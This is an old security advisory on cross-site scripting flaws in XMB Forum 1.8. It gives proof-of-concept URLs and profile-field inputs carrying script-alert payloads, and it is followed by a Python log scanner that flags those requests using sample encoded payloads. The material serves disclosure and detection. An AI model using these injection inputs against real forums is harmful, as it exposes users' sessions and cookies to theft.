Many XSS Vulnerabilities in XMB Forum.

From: Knight Commander (knight4vnat_private)
Date: Sun Jun 22 2003 - 20:53:36 PDT

    Many XSS Vulnerabilities in XMB Forum.
    Program Name     : XMB Forum
    Affected Version : 1.8 Partagium (may be the newest version)
    Home Page        : http://www.xmbforum.com
    Author           : Knight Commander (at hackervn.net)
    
    +Vul:
    In this link:
    http://pathto/XMBforum/member.php?action=viewpro&member=admin<script>alert('XSS')</script>
    and
    http://pathto/XMBforum/buddy.php?action=<script>alert('XSS')</script>&buddy=<script>alert('XSS')</script>
    or in your profile:
    just fill in the MSN and Current Mood text boxes with: <script>alert('XSS')</script>
    When others view your profile, their cookies will be stolen.
    
    Solution:
    Vendor was contacted. The new version will be released soon.
    Regards!
    email: knight4vnat_private
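
A log check for the two reflected cases above, added here as an example and not part of the original advisory or of XMB: it flags requests to member.php and buddy.php whose member, action or buddy value contains markup after percent-decoding. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration; the stored profile-field case does not appear in query strings and is not covered.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Scripts and parameters named in the advisory above.
WATCHED = {"member.php": {"member"}, "buddy.php": {"action", "buddy"}}

# Heuristic: markup characters a member name or action keyword should not need.
# A legitimate name containing a quote would also be flagged.
MARKUP = re.compile(r"[<>\"']")

# Request line of an access-log entry (combined log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jun/2003:10:00:01 -0700] "GET /XMBforum/member.php?action=viewpro&member=admin HTTP/1.0" 200 5120',
    '192.0.2.44 - - [23/Jun/2003:10:00:07 -0700] "GET /XMBforum/member.php?action=viewpro&member=admin%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.0" 200 5188',
    '192.0.2.44 - - [23/Jun/2003:10:00:09 -0700] "GET /XMBforum/buddy.php?action=%253Cscript%253E&buddy=%3Cscript%3E HTTP/1.0" 200 2048',
]


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return sorted (script, parameter) pairs whose decoded value has markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    hits = set()
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in WATCHED.get(script, ()) and MARKUP.search(decode_fully(value)):
            hits.add((script, name))
    return sorted(hits)


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(suspicious_params(entry) or "clean", "<-", entry.split('"')[1])
```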
    


